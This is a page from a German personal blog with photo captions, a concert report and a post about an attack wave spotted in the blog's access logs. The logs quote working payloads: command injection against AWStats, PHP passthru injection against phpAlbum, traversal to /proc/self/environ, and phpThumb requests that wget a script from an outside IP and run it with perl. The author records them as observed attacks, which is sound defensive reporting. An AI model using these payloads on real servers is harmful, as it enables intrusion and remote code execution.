94.23.42.121 – - [28/Dec/2011:03:54:28 +0100] “GET /components/com_alphacontent/assets/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:28 +0100] “GET /components/com_hotornot2/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:29 +0100] “GET /components/com_alphauserpoints/assets/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:29 +0100] “GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:30 +0100] “GET /zadmin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:30 +0100] “GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:31 +0100] “GET /components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
94.23.42.121 – - [28/Dec/2011:03:54:31 +0100] “GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1″ 404 19568 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″

Schöner Schein

Jan Martin Keil — Fri, 16 Dec 2011 19:33:00 +0000

Wie etwas scheint, ist nur eine Frage des Blickwinkels.

Rummel-Tristes

Jan Martin Keil — Fri, 16 Dec 2011 14:22:00 +0000

Zwischen all dem altmodischen Neon-Blinken fehlt einem Rummel jegliche Wärme und Gemütlichkeit.

Angriffswelle auf Webseiten mit diverser veralteter Software

Jan Martin Keil — Mon, 12 Dec 2011 15:32:05 +0000

In der Zugriffsstatistik des Blogs sind mir gerade seltsame Einträge aufgefallen. Die sehen sehr nach einem Injektion-Angriff aus. Und kurzes Googeln ergab, dass ich offenbar gerade nicht der einzige bin.
Allerdings handelt es sich um das Blinde suchen nach unsicheren phpAlbum-Versionen (dass es sich um eine alte, längst geschlossene Sicherheitslücke handelt steht in einem Beitrag von heute im Bug-Tracker) und AWStats-Versionen, sowie dem Versuch die über Environment-Variablen Code zu injizieren, wozu diverse potenzielle Sicherheitslücken ausprobiert werden, die ich jetzt nicht im Detail recherchiert habe. Das aktuelle WordPress scheinen sie aber nicht zu betreffen.

68.78.199.247 – - [12/Dec/2011:14:02:08 +0100] “GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:10 +0100] “GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:12 +0100] “GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:14 +0100] “GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:16 +0100] “GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:18 +0100] “GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:19 +0100] “GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:21 +0100] “GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:24 +0100] “GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:26 +0100] “GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:27 +0100] “GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:27 +0100] “GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:28 +0100] “GET /main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:29 +0100] “GET /phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:30 +0100] “GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:30 +0100] “GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:31 +0100] “GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:32 +0100] “GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:32 +0100] “GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″
68.78.199.247 – - [12/Dec/2011:14:02:33 +0100] “GET /?file=../../../../../../proc/self/environ%00 HTTP/1.1″ 200 20829 “-” “”
68.78.199.247 – - [12/Dec/2011:14:02:34 +0100] “GET /?page=../../../../../../proc/self/environ%00 HTTP/1.1″ 301 309 “-” “”
68.78.199.247 – - [12/Dec/2011:14:02:34 +0100] “GET /?mod=../../../../../../proc/self/environ%00 HTTP/1.1″ 200 20829 “-” “”
68.78.199.247 – - [12/Dec/2011:14:02:35 +0100] “GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1″ 200 20829 “-” “”
68.78.199.247 – - [12/Dec/2011:14:02:36 +0100] “GET /site.php?a={%24{passthru%28chr%28105%29.chr%28100%29%29}} HTTP/1.1″ 404 18734 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0″

Carpe Noctem auf dem Mittelaltermarkt

Jan Martin Keil — Sat, 10 Dec 2011 14:58:12 +0000

Ich hatte gestern das Vergnügen die Band Carpe Noctem, die ich schon seit längerem live erleben wollte, zuerst zufällig in der Fußgängerzone und dann auf einem kleinen Konzert auf der Mittelalter-Markt-Bühne, zu dem sie spontan eingeladen wurden, zu hören. Da ich mich eigentlich gerade auf dem Heimweg von einer Fototour über den Rummel befand (Bilder folgen noch), war auch die Fotoausrüstung dabei und so konnte ich sogar einige Bilder machen, bis irgendwann alle Speicherkarten voll waren, denn ich befand mich wie gesagt gerade schon auf dem Heimweg von einer Fototour. Am Ende gab es außerdem noch eine kurze aber schöne Session von Carpe Noctem und ~~Fisimatente~~ Viesemattente (Danke für den Hinweis), ~~so glaube ich mich zumindest zu erinnern, dass die Spielmannsgruppe (“Band” wäre etwas unpassend), hieß,~~ die schon davor zur Bespaßung des Mittelaltermarktes spielte. Übrigens habe ich gerade erfahren, dass Carpe Noctem heute Abend, 18 Uhr gleich nocheinmal auf dem Mittelaltermarkt spielen wird.